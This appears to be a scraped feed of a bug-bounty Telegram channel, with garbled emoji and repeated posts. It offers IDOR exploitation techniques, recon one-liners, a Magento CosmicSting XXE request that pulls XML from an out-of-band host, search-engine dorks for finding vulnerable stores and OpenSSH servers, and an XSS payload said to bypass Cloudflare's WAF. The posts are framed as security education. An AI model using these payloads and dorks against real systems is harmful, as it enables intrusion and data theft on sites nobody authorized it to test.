βοΈPentest-Windows
π°Windows11 Penetration Suite Toolkit
πA Windows penetration testing environment that works out of the box.
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
πLink: https://lnkd.in/gtX3GbR8
π#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
π°Windows11 Penetration Suite Toolkit
πA Windows penetration testing environment that works out of the box.
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
πLink: https://lnkd.in/gtX3GbR8
π#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
π₯1
This media is not supported in your browser
VIEW IN TELEGRAM
π’You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
πExample:
π¨You can then check the status of these endpoints or filter in order to find new vulnerabilities:
β Example:
πExample:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
π¨You can then check the status of these endpoints or filter in order to find new vulnerabilities:
β Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
π2π₯1
πͺπ»Scan for Adobe Commerce & Magento - XXE
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
π Details: https://lnkd.in/dBy32DtY
π Nuclei Template: https://lnkd.in/dUNFMUny
π§ GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
π Details: https://lnkd.in/dBy32DtY
π Nuclei Template: https://lnkd.in/dUNFMUny
π§ GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
π1
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
πΉ Web Scanner & Crawler
πΉFuzzing with Intruder (Part3)
πΉFuzzing with Intruder (Part2)
πΉFuzzing with Intruder (Part1)
πΉXSS Validator
πΉConfiguring Proxy
πΉBurp Collaborator
πΉHackBar
πΉBurp Sequencer
πΉTurbo Intruder
πΉEngagement Tools
πΉPayload Processing Rule (Part2)
πΉPayload Processing Rule (Part1)
πΉBeginners Guide to Burpsuite Payloads (Part2)
πΉBeginners Guide to Burpsuite Payloads (Part1)
πΉEncoder & Decoder Tutorial
πΉActive Scan++
πΉSoftware Vulnerability Scanner
πΉBurpβs Project Management
πΉRepeater
Please open Telegram to view this post
VIEW IN TELEGRAM
π4π₯2π«‘1
dubbed βCosmicStingβ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
π¨Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
π¨Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed βCosmicStingβ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
β CosmicSting enables attackers to gain unauthorized access
to sensitive files, includingβ¦
dubbed βCosmicStingβ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
β CosmicSting enables attackers to gain unauthorized access
to sensitive files, includingβ¦
π6π€―2π±1
#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
π2π€1
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
π3β€1π₯1
When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Unauthenticated Magento XXE to Path traversal | CVE-2024-34102 | Bug Bounty POC
π₯Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed βCosmicStingβ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
β οΈCosmicSting enables attackers to gain unauthorized access to sensitive filesβ¦
built on Adobe Commerce and Magento platforms.
β οΈCosmicSting enables attackers to gain unauthorized access to sensitive filesβ¦
π2π±2
Hope you guys learning from the resources which I am sharing, if you have any suggestions or questions you can do comment.
Thanks and Regards,
The Brut Security TeamβοΈ
Thanks and Regards,
The Brut Security Team
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯6π4
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
π₯8π1
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
π11
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯1
This media is not supported in your browser
VIEW IN TELEGRAM
π’CSPRecon: Discover new target domains using Content Security Policy.
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
π Download: https://github.com/edoardottt/csprecon
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
π Download: https://github.com/edoardottt/csprecon
π7
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - v4d1/Dome: Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan toβ¦
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports. - GitHub - v4d1/Dome: Dome - Subdomain Enum...
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3π€‘2
β οΈ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw βregreSSHionβ Exposes Millions of Linux Systems
π―96.4 million+ Results are found on the en.fofa.info nearly year.
π₯FOFA Dork: app="OpenSSH"
πRefer: https://lnkd.in/gkENKHPv
βΉοΈPOC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
π―96.4 million+ Results are found on the en.fofa.info nearly year.
π₯FOFA Dork: app="OpenSSH"
πRefer: https://lnkd.in/gkENKHPv
βΉοΈPOC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
π₯2
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4β€βπ₯1π1